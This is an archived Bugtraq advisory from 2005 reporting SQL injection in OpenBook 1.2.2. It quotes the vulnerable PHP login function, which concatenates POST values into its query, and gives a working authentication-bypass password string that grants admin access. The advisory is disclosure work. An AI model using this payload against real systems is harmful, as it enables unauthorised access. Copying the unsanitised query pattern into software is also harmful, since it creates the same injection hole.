Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:




bugtraq logo Bugtraq mailing list archives

[SVadvisory] - SQL injection in OpenBook 1.2.2
From: svt () svt nukleon us
Date: 30 Jul 2005 21:09:51 -0000

SVadvisory#12
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  Title: SQl injection                    
Product: OpenBook                        
Version: 1.2.2                           
   Site: http://openbook.sourceforge.net/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerabilities
***************
Code:
   function auth_user($userid, $password)
{
        global $HTTP_POST_VARS;
        global $admin_table;

        $userid=$HTTP_POST_VARS['userid'];
        $password=$HTTP_POST_VARS['password'];

        db_connect();

        $query="SELECT userid "
                                        ."FROM $admin_table "
                                        ."WHERE userid='$userid' AND password=password('$password')";
        $result=mysql_query($query);

        if(!mysql_num_rows($result))
        // no matches
        {
                return 0;
        }
        else
        // match found so return userid
        {
                $query_data=mysql_fetch_array($result);
                return $query_data['userid'];
        }
}// end auth_user()

Variable $userid, $password in admin.php are not checked before premises in SQL request, because of this possible 
produce SQL-injection, after which, any user can gain access to admin panels

Here is idle time example substitutions:
-------------------------------
 User ID: admin
Password: no') or 1/*
-------------------------------

Bug Found
*********
------------------------------------------------
Search Vulnerabilities Team - www.svt.nukleon.us
------------------------------------------------



  By Date           By Thread  

Current thread:
  • [SVadvisory] - SQL injection in OpenBook 1.2.2 svt (Aug 01)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]